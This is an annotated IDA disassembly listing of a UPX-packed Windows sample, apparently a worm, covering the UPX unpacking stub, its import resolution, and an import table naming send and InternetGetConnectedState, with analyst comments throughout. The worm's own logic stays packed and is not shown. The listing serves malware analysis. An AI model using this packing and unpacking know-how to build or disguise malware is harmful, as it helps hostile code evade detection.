UPX1:004070A8                 dd 89673AD3h, 709B37B1h, 41453A0Ch,
0BFE43F2Ah, 4C45503Ch
UPX1:004070A8                 dd 2A000401h, 0E03F377Ch, 38010F00h,
0BFC05B2h, 370201h
UPX1:004070A8                 dd 0CB12CC16h, 3BECE011h, 21306021h,
0CB020B40h, 9F249B0Eh
UPX1:004070A8                 dd 0C603C04h, 733B2C4Fh, 710341Eh,
0E48A10A4h, 0C0502072h
UPX1:004070A8                 dd 0E821AF06h, 74DF2EB8h, 97901407h,
77B2C04h, 0D8603FB7h
UPX1:004070A8                 dd 2ED30067h, 0E8479B62h, 52C34B30h,
0C2801775h, 1E617C2Eh
UPX1:004070A8                 dd 64D8D85Ch, 1A07088Ch, 64D84027h,
2869F66Fh, 2724FBF3h
UPX1:004070A8                 dd 5CCF7C46h, 8C001B60h, 4Fh, 2400080h,
0FF00h, 2 dup(0)
UPX1:004071F0 
UPX1:004071F0 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E
¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
UPX1:004071F0 
UPX1:004071F0 
; start -- the entry routine of the packed file. It is an unpacking stub, not
; the worm's own logic (the section names and the code shape match the UPX
; packer's stub). In order it:
;   1. decompresses the stream at dword_406015 into UPX0, starting at
;      dword_406015 - 5015h = 00401000;
;   2. walks the unpacked bytes and rewrites 0A3h call/jump operands;
;   3. fills in function addresses through three pointers at [esi+7078h],
;      [esi+707Ch] and [esi+7080h] (outside this part of the listing);
;   4. restores the registers and jumps to dword_4011CB inside UPX0.
; Registers while decompressing: esi = read pointer into the packed stream,
; edi = write pointer into the output, ebx = bit buffer, ebp = current match
; offset (a negative number), ecx = match length, eax = scratch.
; Analyst note: everything after the final jmp is absent from the file on disk,
; so signatures and strings taken from the packed file see only fragments. Work
; from a memory dump taken when execution reaches 004011CB, or from an unpacked
; copy (for example upx -d, if the packer headers are intact).
UPX1:004071F0                 public start
UPX1:004071F0 start           proc near
UPX1:004071F0                 pusha                   ; save all registers; popa at loc_40733E restores them
UPX1:004071F1                 mov     esi, offset dword_406015 ; esi = start of packed stream
UPX1:004071F6                 lea     edi, [esi-5015h] ; edi = 00401000, start of UPX0 (output)
UPX1:004071FC                 push    edi             ; keep output base; popped into esi at loc_4072C2
UPX1:004071FD                 or      ebp, 0FFFFFFFFh ; initial match offset = -1
UPX1:00407200                 jmp     short loc_407212 ; begin by loading the first 32 control bits
UPX1:00407200 ;
------------------------------------------------------------------------
---
UPX1:00407202                 align 8
UPX1:00407208 
UPX1:00407208 loc_407208:                             ; CODE XREF:
start+29j
UPX1:00407208                 mov     al, [esi]       ; literal: copy one stream byte to the output
UPX1:0040720A                 inc     esi
UPX1:0040720B                 mov     [edi], al
UPX1:0040720D                 inc     edi
UPX1:0040720E 
UPX1:0040720E loc_40720E:                             ; CODE XREF:
start+B6j
UPX1:0040720E                                         ; start+CDj
UPX1:0040720E                 add     ebx, ebx        ; main loop: shift next control bit into CF
UPX1:00407210                 jnz     short loc_407219 ; bits remain in ebx: use this one
UPX1:00407212 
UPX1:00407212 loc_407212:                             ; CODE XREF:
start+10j
UPX1:00407212                 mov     ebx, [esi]      ; bit buffer empty: reload 32 bits
UPX1:00407214                 sub     esi, 0FFFFFFFCh ; esi += 4; subtracting -4 leaves CF = 1
UPX1:00407217                 adc     ebx, ebx        ; top bit -> CF, the 1 from CF becomes the end marker
UPX1:00407219 
UPX1:00407219 loc_407219:                             ; CODE XREF:
start+20j
UPX1:00407219                 jb      short loc_407208 ; bit = 1: literal byte follows
UPX1:0040721B                 mov     eax, 1          ; bit = 0: match; build the offset value in eax
UPX1:00407220 
UPX1:00407220 loc_407220:                             ; CODE XREF:
start+3Fj
UPX1:00407220                                         ; start+4Aj
UPX1:00407220                 add     ebx, ebx        ; next bit (reload below if the buffer ran out)
UPX1:00407222                 jnz     short loc_40722B
UPX1:00407224                 mov     ebx, [esi]
UPX1:00407226                 sub     esi, 0FFFFFFFCh
UPX1:00407229                 adc     ebx, ebx
UPX1:0040722B 
UPX1:0040722B loc_40722B:                             ; CODE XREF:
start+32j
UPX1:0040722B                 adc     eax, eax        ; eax = eax*2 + bit
UPX1:0040722D                 add     ebx, ebx        ; following bit says whether to continue
UPX1:0040722F                 jnb     short loc_407220 ; 0: read another offset bit
UPX1:00407231                 jnz     short loc_40723C ; 1 and buffer not empty: value complete
UPX1:00407233                 mov     ebx, [esi]      ; buffer was empty: the real bit is in the next dword
UPX1:00407235                 sub     esi, 0FFFFFFFCh
UPX1:00407238                 adc     ebx, ebx
UPX1:0040723A                 jnb     short loc_407220
UPX1:0040723C 
UPX1:0040723C loc_40723C:                             ; CODE XREF:
start+41j
UPX1:0040723C                 xor     ecx, ecx        ; match length accumulator = 0
UPX1:0040723E                 sub     eax, 3
UPX1:00407241                 jb      short loc_407250 ; value was 2: reuse the previous offset in ebp
UPX1:00407243                 shl     eax, 8          ; otherwise: high part from bits, low byte from stream
UPX1:00407246                 mov     al, [esi]
UPX1:00407248                 inc     esi
UPX1:00407249                 xor     eax, 0FFFFFFFFh ; invert; the result is the negative offset
UPX1:0040724C                 jz      short loc_4072C2 ; inverted value 0 = end of the packed stream
UPX1:0040724E                 mov     ebp, eax        ; remember as the current match offset
UPX1:00407250 
UPX1:00407250 loc_407250:                             ; CODE XREF:
start+51j
UPX1:00407250                 add     ebx, ebx        ; read two bits into ecx (match length, short form)
UPX1:00407252                 jnz     short loc_40725B
UPX1:00407254                 mov     ebx, [esi]
UPX1:00407256                 sub     esi, 0FFFFFFFCh
UPX1:00407259                 adc     ebx, ebx
UPX1:0040725B 
UPX1:0040725B loc_40725B:                             ; CODE XREF:
start+62j
UPX1:0040725B                 adc     ecx, ecx
UPX1:0040725D                 add     ebx, ebx
UPX1:0040725F                 jnz     short loc_407268
UPX1:00407261                 mov     ebx, [esi]
UPX1:00407263                 sub     esi, 0FFFFFFFCh
UPX1:00407266                 adc     ebx, ebx
UPX1:00407268 
UPX1:00407268 loc_407268:                             ; CODE XREF:
start+6Fj
UPX1:00407268                 adc     ecx, ecx
UPX1:0040726A                 jnz     short loc_40728C ; two bits non-zero: length is done
UPX1:0040726C                 inc     ecx             ; both bits 0: long form, start from 1
UPX1:0040726D 
UPX1:0040726D loc_40726D:                             ; CODE XREF:
start+8Cj
UPX1:0040726D                                         ; start+97j
UPX1:0040726D                 add     ebx, ebx        ; same bit-pair scheme as the offset loop at loc_407220
UPX1:0040726F                 jnz     short loc_407278
UPX1:00407271                 mov     ebx, [esi]
UPX1:00407273                 sub     esi, 0FFFFFFFCh
UPX1:00407276                 adc     ebx, ebx
UPX1:00407278 
UPX1:00407278 loc_407278:                             ; CODE XREF:
start+7Fj
UPX1:00407278                 adc     ecx, ecx        ; ecx = ecx*2 + bit
UPX1:0040727A                 add     ebx, ebx
UPX1:0040727C                 jnb     short loc_40726D
UPX1:0040727E                 jnz     short loc_407289
UPX1:00407280                 mov     ebx, [esi]
UPX1:00407282                 sub     esi, 0FFFFFFFCh
UPX1:00407285                 adc     ebx, ebx
UPX1:00407287                 jnb     short loc_40726D
UPX1:00407289 
UPX1:00407289 loc_407289:                             ; CODE XREF:
start+8Ej
UPX1:00407289                 add     ecx, 2
UPX1:0040728C 
UPX1:0040728C loc_40728C:                             ; CODE XREF:
start+7Aj
UPX1:0040728C                 cmp     ebp, 0FFFFF300h ; CF = 1 when the match is more than 0D00h bytes back
UPX1:00407292                 adc     ecx, 1          ; length += 1, plus 1 more for such far matches
UPX1:00407295                 lea     edx, [edi+ebp]  ; edx = match source inside the output already written
UPX1:00407298                 cmp     ebp, 0FFFFFFFCh
UPX1:0040729B                 jbe     short loc_4072AC ; source at least 4 bytes back: copy by dwords
UPX1:0040729D 
UPX1:0040729D loc_40729D:                             ; CODE XREF:
start+B4j
UPX1:0040729D                 mov     al, [edx]       ; source closer than 4 bytes: copy byte by byte
UPX1:0040729F                 inc     edx
UPX1:004072A0                 mov     [edi], al
UPX1:004072A2                 inc     edi
UPX1:004072A3                 dec     ecx
UPX1:004072A4                 jnz     short loc_40729D
UPX1:004072A6                 jmp     loc_40720E
UPX1:004072A6 ;
------------------------------------------------------------------------
---
UPX1:004072AB                 align 4
UPX1:004072AC 
UPX1:004072AC loc_4072AC:                             ; CODE XREF:
start+ABj
UPX1:004072AC                                         ; start+C9j
UPX1:004072AC                 mov     eax, [edx]      ; dword copy; may write up to 3 bytes too many
UPX1:004072AE                 add     edx, 4
UPX1:004072B1                 mov     [edi], eax
UPX1:004072B3                 add     edi, 4
UPX1:004072B6                 sub     ecx, 4
UPX1:004072B9                 ja      short loc_4072AC
UPX1:004072BB                 add     edi, ecx        ; ecx is 0 or negative here: step edi back to the true end
UPX1:004072BD                 jmp     loc_40720E
UPX1:004072C2 ;
------------------------------------------------------------------------
---
UPX1:004072C2 
UPX1:004072C2 loc_4072C2:                             ; CODE XREF:
start+5Cj
UPX1:004072C2                 pop     esi             ; decompression done; esi = output base pushed at entry
UPX1:004072C3                 mov     edi, esi        ; edi scans the unpacked bytes
UPX1:004072C5                 mov     ecx, 0A3h       ; number of operands to rewrite (counted by loop below)
UPX1:004072CA 
UPX1:004072CA loc_4072CA:                             ; CODE XREF:
start+E1j
UPX1:004072CA                                         ; start+E6j
UPX1:004072CA                 mov     al, [edi]
UPX1:004072CC                 inc     edi
UPX1:004072CD                 sub     al, 0E8h        ; al = 0 or 1 only for bytes 0E8h / 0E9h (call / jmp opcodes)
UPX1:004072CF 
UPX1:004072CF loc_4072CF:                             ; CODE XREF:
start+104j
UPX1:004072CF                 cmp     al, 1
UPX1:004072D1                 ja      short loc_4072CA ; not E8/E9: keep scanning
UPX1:004072D3                 cmp     byte ptr [edi], 1 ; first operand byte must be the marker 01
UPX1:004072D6                 jnz     short loc_4072CA
UPX1:004072D8                 mov     eax, [edi]      ; stored operand: marker byte + 3 bytes, high byte first
UPX1:004072DA                 mov     bl, [edi+4]     ; byte after the operand, tested on the next pass
UPX1:004072DD                 shr     ax, 8           ; drop the marker byte
UPX1:004072E1                 rol     eax, 10h        ; these two steps put the 3 bytes
UPX1:004072E4                 xchg    al, ah          ;   into normal little-endian order
UPX1:004072E6                 sub     eax, edi        ; eax = value - edi + esi:
UPX1:004072E8                 sub     bl, 0E8h
UPX1:004072EB                 add     eax, esi        ;   presumably back to a relative displacement
UPX1:004072ED                 mov     [edi], eax      ; write the rewritten operand
UPX1:004072EF                 add     edi, 5          ; skip the operand and the byte already read into bl
UPX1:004072F2                 mov     eax, ebx        ; al = that byte - 0E8h, for the test at loc_4072CF
UPX1:004072F4                 loop    loc_4072CF      ; repeat until ecx operands are done
UPX1:004072F6                 lea     edi, [esi+5000h] ; edi = table used to fill in imports -- layout not shown here
UPX1:004072FC 
UPX1:004072FC loc_4072FC:                             ; CODE XREF:
start+12Ej
UPX1:004072FC                 mov     eax, [edi]      ; per-library record: first dword 0 ends the table
UPX1:004072FE                 or      eax, eax
UPX1:00407300                 jz      short loc_40733E
UPX1:00407302                 mov     ebx, [edi+4]    ; second dword: offset where resolved addresses are stored
UPX1:00407305                 lea     eax, [eax+esi+7000h] ; argument for the call below (presumably a DLL name)
UPX1:0040730C                 add     ebx, esi        ; ebx = absolute address of the first slot to fill
UPX1:0040730E                 push    eax
UPX1:0040730F                 add     edi, 8
UPX1:00407312                 call    dword ptr [esi+7078h] ; presumably LoadLibraryA -- pointer is outside this listing, confirm
UPX1:00407318                 xchg    eax, ebp        ; ebp = value returned by that call
UPX1:00407319 
UPX1:00407319 loc_407319:                             ; CODE XREF:
start+146j
UPX1:00407319                 mov     al, [edi]       ; entry type byte; 0 = end of this library's list
UPX1:0040731B                 inc     edi
UPX1:0040731C                 or      al, al
UPX1:0040731E                 jz      short loc_4072FC
UPX1:00407320                 mov     ecx, edi        ; large count for the scan below
UPX1:00407322                 push    edi             ; argument: pointer to the entry's string
UPX1:00407323                 dec     eax             ; al becomes 0 when the type byte was 1
UPX1:00407324                 repne scasb             ; then this skips edi past the string's terminating zero
UPX1:00407326                 push    ebp
UPX1:00407327                 call    dword ptr [esi+707Ch] ; presumably GetProcAddress -- confirm
UPX1:0040732D                 or      eax, eax
UPX1:0040732F                 jz      short loc_407338 ; lookup failed
UPX1:00407331                 mov     [ebx], eax      ; store the resolved address in the next slot
UPX1:00407333                 add     ebx, 4
UPX1:00407336                 jmp     short loc_407319
UPX1:00407338 ;
------------------------------------------------------------------------
---
UPX1:00407338 
UPX1:00407338 loc_407338:                             ; CODE XREF:
start+13Fj
UPX1:00407338                 call    dword ptr [esi+7080h] ; failure path; presumably ExitProcess -- confirm
UPX1:0040733E 
UPX1:0040733E loc_40733E:                             ; CODE XREF:
start+110j
UPX1:0040733E                 popa                    ; restore the registers saved at entry
UPX1:0040733F                 jmp     near ptr dword_4011CB ; hand over to the unpacked program in UPX0
UPX1:0040733F start           endp
UPX1:0040733F 
UPX1:0040733F ; ---------------------------------------------------------------------------
; Tail of UPX1 after the unpacking stub. The 2Fh zero dwords run from 00407344h
; up to 00407400h, which is UPX1's start (00406000h) plus its size in file
; (1400h). The 300h uninitialised dwords that follow reach 00408000h, where
; UPX2 starts; presumably they are virtual-only, with no bytes behind them in
; the file.
UPX1:00407344                 dd 2Fh dup(0)
UPX1:00407400                 dd 300h dup(?)
UPX1:00407400 UPX1            ends
UPX1:00407400 
UPX2:00408000 ; Section 3. (virtual address 00008000)
UPX2:00408000 ; Virtual size                  : 00001000 (   4096.)
UPX2:00408000 ; Section size in file          : 00000200 (    512.)
UPX2:00408000 ; Offset to raw data for section: 00001600
UPX2:00408000 ; Flags C0000040: Data Readable Writable
UPX2:00408000 ; Alignment     : 16 bytes ?
UPX2:00408000 ; ---------------------------------------------------------------------------
UPX2:00408000 
UPX2:00408000 ; Segment type: Pure data
UPX2:00408000 ; Segment permissions: Read/Write
UPX2:00408000 UPX2            segment para public 'DATA' use32
UPX2:00408000                 assume cs:UPX2
UPX2:00408000                 ;org 408000h
; The segment opens with bytes that have the layout of the PE import
; directory: five 20-byte IMAGE_IMPORT_DESCRIPTOR records followed by an
; all-zero terminator record. IDA left them as single bytes. In every record
; only the Name RVA (offset 0Ch) and the FirstThunk RVA (offset 10h) are set.
; Added to the image base implied by the listing addresses (00400000h), they
; land on the DLL-name strings and the import slots defined further down in
; this segment.
;
; record 0, 00408000h-00408013h
UPX2:00408000                 db    0 ;  
UPX2:00408001                 db    0 ;  
UPX2:00408002                 db    0 ;  
UPX2:00408003                 db    0 ;  
UPX2:00408004                 db    0 ;  
UPX2:00408005                 db    0 ;  
UPX2:00408006                 db    0 ;  
UPX2:00408007                 db    0 ;  
UPX2:00408008                 db    0 ;  
UPX2:00408009                 db    0 ;  
UPX2:0040800A                 db    0 ;  
UPX2:0040800B                 db    0 ;  
UPX2:0040800C                 db 0A8h ; ¿  Name RVA = 000080A8h -> aKernel32_dll (004080A8h)
UPX2:0040800D                 db  80h ; Ç
UPX2:0040800E                 db    0 ;  
UPX2:0040800F                 db    0 ;  
UPX2:00408010                 db  78h ; x  FirstThunk RVA = 00008078h -> LoadLibraryA slot (00408078h)
UPX2:00408011                 db  80h ; Ç
UPX2:00408012                 db    0 ;  
UPX2:00408013                 db    0 ;  
; record 1, 00408014h-00408027h
UPX2:00408014                 db    0 ;  
UPX2:00408015                 db    0 ;  
UPX2:00408016                 db    0 ;  
UPX2:00408017                 db    0 ;  
UPX2:00408018                 db    0 ;  
UPX2:00408019                 db    0 ;  
UPX2:0040801A                 db    0 ;  
UPX2:0040801B                 db    0 ;  
UPX2:0040801C                 db    0 ;  
UPX2:0040801D                 db    0 ;  
UPX2:0040801E                 db    0 ;  
UPX2:0040801F                 db    0 ;  
UPX2:00408020                 db 0B5h ; ¦  Name RVA = 000080B5h -> aAdvapi32_dll (004080B5h)
UPX2:00408021                 db  80h ; Ç
UPX2:00408022                 db    0 ;  
UPX2:00408023                 db    0 ;  
UPX2:00408024                 db  88h ; ê  FirstThunk RVA = 00008088h -> RegCloseKey slot (00408088h)
UPX2:00408025                 db  80h ; Ç
UPX2:00408026                 db    0 ;  
UPX2:00408027                 db    0 ;  
; record 2, 00408028h-0040803Bh
UPX2:00408028                 db    0 ;  
UPX2:00408029                 db    0 ;  
UPX2:0040802A                 db    0 ;  
UPX2:0040802B                 db    0 ;  
UPX2:0040802C                 db    0 ;  
UPX2:0040802D                 db    0 ;  
UPX2:0040802E                 db    0 ;  
UPX2:0040802F                 db    0 ;  
UPX2:00408030                 db    0 ;  
UPX2:00408031                 db    0 ;  
UPX2:00408032                 db    0 ;  
UPX2:00408033                 db    0 ;  
UPX2:00408034                 db 0C2h ; -  Name RVA = 000080C2h -> aCrtdll_dll (004080C2h)
UPX2:00408035                 db  80h ; Ç
UPX2:00408036                 db    0 ;  
UPX2:00408037                 db    0 ;  
UPX2:00408038                 db  90h ; É  FirstThunk RVA = 00008090h -> atoi slot (00408090h)
UPX2:00408039                 db  80h ; Ç
UPX2:0040803A                 db    0 ;  
UPX2:0040803B                 db    0 ;  
; record 3, 0040803Ch-0040804Fh
UPX2:0040803C                 db    0 ;  
UPX2:0040803D                 db    0 ;  
UPX2:0040803E                 db    0 ;  
UPX2:0040803F                 db    0 ;  
UPX2:00408040                 db    0 ;  
UPX2:00408041                 db    0 ;  
UPX2:00408042                 db    0 ;  
UPX2:00408043                 db    0 ;  
UPX2:00408044                 db    0 ;  
UPX2:00408045                 db    0 ;  
UPX2:00408046                 db    0 ;  
UPX2:00408047                 db    0 ;  
UPX2:00408048                 db 0CDh ; -  Name RVA = 000080CDh -> aWininet_dll (004080CDh)
UPX2:00408049                 db  80h ; Ç
UPX2:0040804A                 db    0 ;  
UPX2:0040804B                 db    0 ;  
UPX2:0040804C                 db  98h ; ÿ  FirstThunk RVA = 00008098h -> InternetGetConnectedState slot (00408098h)
UPX2:0040804D                 db  80h ; Ç
UPX2:0040804E                 db    0 ;  
UPX2:0040804F                 db    0 ;  
; record 4, 00408050h-00408063h
UPX2:00408050                 db    0 ;  
UPX2:00408051                 db    0 ;  
UPX2:00408052                 db    0 ;  
UPX2:00408053                 db    0 ;  
UPX2:00408054                 db    0 ;  
UPX2:00408055                 db    0 ;  
UPX2:00408056                 db    0 ;  
UPX2:00408057                 db    0 ;  
UPX2:00408058                 db    0 ;  
UPX2:00408059                 db    0 ;  
UPX2:0040805A                 db    0 ;  
UPX2:0040805B                 db    0 ;  
UPX2:0040805C                 db 0D9h ; +  Name RVA = 000080D9h -> aWs2_32_dll (004080D9h)
UPX2:0040805D                 db  80h ; Ç
UPX2:0040805E                 db    0 ;  
UPX2:0040805F                 db    0 ;  
UPX2:00408060                 db 0A0h ; á  FirstThunk RVA = 000080A0h -> send slot (004080A0h)
UPX2:00408061                 db  80h ; Ç
UPX2:00408062                 db    0 ;  
UPX2:00408063                 db    0 ;  
; all-zero record, 00408064h-00408077h: ends the list of records
UPX2:00408064                 db    0 ;  
UPX2:00408065                 db    0 ;  
UPX2:00408066                 db    0 ;  
UPX2:00408067                 db    0 ;  
UPX2:00408068                 db    0 ;  
UPX2:00408069                 db    0 ;  
UPX2:0040806A                 db    0 ;  
UPX2:0040806B                 db    0 ;  
UPX2:0040806C                 db    0 ;  
UPX2:0040806D                 db    0 ;  
UPX2:0040806E                 db    0 ;  
UPX2:0040806F                 db    0 ;  
UPX2:00408070                 db    0 ;  
UPX2:00408071                 db    0 ;  
UPX2:00408072                 db    0 ;  
UPX2:00408073                 db    0 ;  
UPX2:00408074                 db    0 ;  
UPX2:00408075                 db    0 ;  
UPX2:00408076                 db    0 ;  
UPX2:00408077                 db    0 ;  
; Import address slots for the five DLLs named in the records at the top of
; UPX2. IDA prints each slot as `dd ?` under the name it resolved, so the
; on-disk thunk values are not visible here. Only seven functions are imported
; statically, and KERNEL32.DLL contributes LoadLibraryA and GetProcAddress.
; The loop at loc_4072FC/loc_407319 in the stub calls through [esi+7078h] and
; [esi+707Ch] and stores each returned address with `mov [ebx], eax`; that
; matches these two slots if esi holds 00401000h (not established by the lines
; shown). The program's real imports would then be resolved at run time, so
; this table understates what the sample can call, and import-based triage
; belongs on the unpacked image.
UPX2:00408078 ; 
UPX2:00408078 ; Imports from KERNEL32.DLL
UPX2:00408078 ; 
UPX2:00408078 ; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
UPX2:00408078 LoadLibraryA    dd ?                    ; 00408078h is the FirstThunk target of the KERNEL32.DLL record
UPX2:0040807C ; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR
lpProcName)
UPX2:0040807C GetProcAddress  dd ?
UPX2:00408080 ; void __stdcall ExitProcess(UINT uExitCode)
UPX2:00408080 ExitProcess     dd ?                    ; presumably the [esi+7080h] call at loc_407338, taken when a lookup returns 0
UPX2:00408084                 dd 0                    ; zero entry ends the KERNEL32.DLL slot list
UPX2:00408088 ; 
UPX2:00408088 ; Imports from ADVAPI32.DLL
UPX2:00408088 ; 
UPX2:00408088 ; LONG __stdcall RegCloseKey(HKEY hKey)
UPX2:00408088 RegCloseKey     dd ?                    ; the only ADVAPI32.DLL slot
UPX2:0040808C                 dd 0                    ; end of ADVAPI32.DLL slot list
UPX2:00408090 ; 
UPX2:00408090 ; Imports from CRTDLL.DLL
UPX2:00408090 ; 
UPX2:00408090 atoi            dd ?                    ; the only CRTDLL.DLL slot
UPX2:00408094                 dd 0                    ; end of CRTDLL.DLL slot list
UPX2:00408098 ; 
UPX2:00408098 ; Imports from WININET.DLL
UPX2:00408098 ; 
UPX2:00408098 InternetGetConnectedState dd ?          ; the only WININET.DLL slot
UPX2:0040809C                 dd 0                    ; end of WININET.DLL slot list
UPX2:004080A0 ; 
UPX2:004080A0 ; Imports from WS2_32.DLL
UPX2:004080A0 ; 
UPX2:004080A0 ; int __stdcall send(SOCKET s,const char *buf,int len,int
flags)
UPX2:004080A0 send            dd ?                    ; the only WS2_32.DLL slot
UPX2:004080A4                 dd 0                    ; end of WS2_32.DLL slot list
; NUL-terminated DLL names. Their addresses (004080A8h, 004080B5h, 004080C2h,
; 004080CDh, 004080D9h) equal the image base 00400000h plus the Name RVAs
; stored at offset 0Ch of the five records at the top of UPX2.
UPX2:004080A8 aKernel32_dll   db 'KERNEL32.DLL',0
UPX2:004080B5 aAdvapi32_dll   db 'ADVAPI32.DLL',0
UPX2:004080C2 aCrtdll_dll     db 'CRTDLL.DLL',0
UPX2:004080CD aWininet_dll    db 'WININET.DLL',0
UPX2:004080D9 aWs2_32_dll     db 'WS2_32.DLL',0
; Function-name strings that IDA left as single bytes. Every name starts on an
; even address and is preceded by two zero bytes, which fits the
; IMAGE_IMPORT_BY_NAME layout (16-bit hint, then a NUL-terminated name) with a
; hint of 0. Presumably the on-disk thunk values of the import slots point at
; these entries; those values are not shown in the listing, so confirm against
; the file. The names are the same seven functions IDA labels on the slots.
UPX2:004080E4                 db    0 ;  
UPX2:004080E5                 db    0 ;  
; ASCII "LoadLibraryA"
UPX2:004080E6                 db  4Ch ; L
UPX2:004080E7                 db  6Fh ; o
UPX2:004080E8                 db  61h ; a
UPX2:004080E9                 db  64h ; d
UPX2:004080EA                 db  4Ch ; L
UPX2:004080EB                 db  69h ; i
UPX2:004080EC                 db  62h ; b
UPX2:004080ED                 db  72h ; r
UPX2:004080EE                 db  61h ; a
UPX2:004080EF                 db  72h ; r
UPX2:004080F0                 db  79h ; y
UPX2:004080F1                 db  41h ; A
UPX2:004080F2                 db    0 ;  
UPX2:004080F3                 db    0 ;  
; ASCII "GetProcAddress"
UPX2:004080F4                 db  47h ; G
UPX2:004080F5                 db  65h ; e
UPX2:004080F6                 db  74h ; t
UPX2:004080F7                 db  50h ; P
UPX2:004080F8                 db  72h ; r
UPX2:004080F9                 db  6Fh ; o
UPX2:004080FA                 db  63h ; c
UPX2:004080FB                 db  41h ; A
UPX2:004080FC                 db  64h ; d
UPX2:004080FD                 db  64h ; d
UPX2:004080FE                 db  72h ; r
UPX2:004080FF                 db  65h ; e
UPX2:00408100                 db  73h ; s
UPX2:00408101                 db  73h ; s
UPX2:00408102                 db    0 ;  
UPX2:00408103                 db    0 ;  
; ASCII "ExitProcess"
UPX2:00408104                 db  45h ; E
UPX2:00408105                 db  78h ; x
UPX2:00408106                 db  69h ; i
UPX2:00408107                 db  74h ; t
UPX2:00408108                 db  50h ; P
UPX2:00408109                 db  72h ; r
UPX2:0040810A                 db  6Fh ; o
UPX2:0040810B                 db  63h ; c
UPX2:0040810C                 db  65h ; e
UPX2:0040810D                 db  73h ; s
UPX2:0040810E                 db  73h ; s
UPX2:0040810F                 db    0 ;  
UPX2:00408110                 db    0 ;  
UPX2:00408111                 db    0 ;  
; ASCII "RegCloseKey"
UPX2:00408112                 db  52h ; R
UPX2:00408113                 db  65h ; e
UPX2:00408114                 db  67h ; g
UPX2:00408115                 db  43h ; C
UPX2:00408116                 db  6Ch ; l
UPX2:00408117                 db  6Fh ; o
UPX2:00408118                 db  73h ; s
UPX2:00408119                 db  65h ; e
UPX2:0040811A                 db  4Bh ; K
UPX2:0040811B                 db  65h ; e
UPX2:0040811C                 db  79h ; y
UPX2:0040811D                 db    0 ;  
UPX2:0040811E                 db    0 ;  
UPX2:0040811F                 db    0 ;  
; ASCII "atoi"
UPX2:00408120                 db  61h ; a
UPX2:00408121                 db  74h ; t
UPX2:00408122                 db  6Fh ; o
UPX2:00408123                 db  69h ; i
UPX2:00408124                 db    0 ;  
UPX2:00408125                 db    0 ;  
; ASCII "InternetGetConnectedState"
UPX2:00408126                 db  49h ; I
UPX2:00408127                 db  6Eh ; n
UPX2:00408128                 db  74h ; t
UPX2:00408129                 db  65h ; e
UPX2:0040812A                 db  72h ; r
UPX2:0040812B                 db  6Eh ; n
UPX2:0040812C                 db  65h ; e
UPX2:0040812D                 db  74h ; t
UPX2:0040812E                 db  47h ; G
UPX2:0040812F                 db  65h ; e
UPX2:00408130                 db  74h ; t
UPX2:00408131                 db  43h ; C
UPX2:00408132                 db  6Fh ; o
UPX2:00408133                 db  6Eh ; n
UPX2:00408134                 db  6Eh ; n
UPX2:00408135                 db  65h ; e
UPX2:00408136                 db  63h ; c
UPX2:00408137                 db  74h ; t
UPX2:00408138                 db  65h ; e
UPX2:00408139                 db  64h ; d
UPX2:0040813A                 db  53h ; S
UPX2:0040813B                 db  74h ; t
UPX2:0040813C                 db  61h ; a
UPX2:0040813D                 db  74h ; t
UPX2:0040813E                 db  65h ; e
UPX2:0040813F                 db    0 ;  
UPX2:00408140                 db    0 ;  
UPX2:00408141                 db    0 ;  
; ASCII "send"
UPX2:00408142                 db  73h ; s
UPX2:00408143                 db  65h ; e
UPX2:00408144                 db  6Eh ; n
UPX2:00408145                 db  64h ; d
UPX2:00408146                 db    0 ;  
; Zero fill from 00408147h through 004081FFh. 00408200h is UPX2's start
; (00408000h) plus its size in file (200h); the `align 1000h` that follows
; covers the rest of the section's 1000h-byte virtual size.
UPX2:00408147                 db    0 ;  
UPX2:00408148                 db    0 ;  
UPX2:00408149                 db    0 ;  
UPX2:0040814A                 db    0 ;  
UPX2:0040814B                 db    0 ;  
UPX2:0040814C                 db    0 ;  
UPX2:0040814D                 db    0 ;  
UPX2:0040814E                 db    0 ;  
UPX2:0040814F                 db    0 ;  
UPX2:00408150                 db    0 ;  
UPX2:00408151                 db    0 ;  
UPX2:00408152                 db    0 ;  
UPX2:00408153                 db    0 ;  
UPX2:00408154                 db    0 ;  
UPX2:00408155                 db    0 ;  
UPX2:00408156                 db    0 ;  
UPX2:00408157                 db    0 ;  
UPX2:00408158                 db    0 ;  
UPX2:00408159                 db    0 ;  
UPX2:0040815A                 db    0 ;  
UPX2:0040815B                 db    0 ;  
UPX2:0040815C                 db    0 ;  
UPX2:0040815D                 db    0 ;  
UPX2:0040815E                 db    0 ;  
UPX2:0040815F                 db    0 ;  
UPX2:00408160                 db    0 ;  
UPX2:00408161                 db    0 ;  
UPX2:00408162                 db    0 ;  
UPX2:00408163                 db    0 ;  
UPX2:00408164                 db    0 ;  
UPX2:00408165                 db    0 ;  
UPX2:00408166                 db    0 ;  
UPX2:00408167                 db    0 ;  
UPX2:00408168                 db    0 ;  
UPX2:00408169                 db    0 ;  
UPX2:0040816A                 db    0 ;  
UPX2:0040816B                 db    0 ;  
UPX2:0040816C                 db    0 ;  
UPX2:0040816D                 db    0 ;  
UPX2:0040816E                 db    0 ;  
UPX2:0040816F                 db    0 ;  
UPX2:00408170                 db    0 ;  
UPX2:00408171                 db    0 ;  
UPX2:00408172                 db    0 ;  
UPX2:00408173                 db    0 ;  
UPX2:00408174                 db    0 ;  
UPX2:00408175                 db    0 ;  
UPX2:00408176                 db    0 ;  
UPX2:00408177                 db    0 ;  
UPX2:00408178                 db    0 ;  
UPX2:00408179                 db    0 ;  
UPX2:0040817A                 db    0 ;  
UPX2:0040817B                 db    0 ;  
UPX2:0040817C                 db    0 ;  
UPX2:0040817D                 db    0 ;  
UPX2:0040817E                 db    0 ;  
UPX2:0040817F                 db    0 ;  
UPX2:00408180                 db    0 ;  
UPX2:00408181                 db    0 ;  
UPX2:00408182                 db    0 ;  
UPX2:00408183                 db    0 ;  
UPX2:00408184                 db    0 ;  
UPX2:00408185                 db    0 ;  
UPX2:00408186                 db    0 ;  
UPX2:00408187                 db    0 ;  
UPX2:00408188                 db    0 ;  
UPX2:00408189                 db    0 ;  
UPX2:0040818A                 db    0 ;  
UPX2:0040818B                 db    0 ;  
UPX2:0040818C                 db    0 ;  
UPX2:0040818D                 db    0 ;  
UPX2:0040818E                 db    0 ;  
UPX2:0040818F                 db    0 ;  
UPX2:00408190                 db    0 ;  
UPX2:00408191                 db    0 ;  
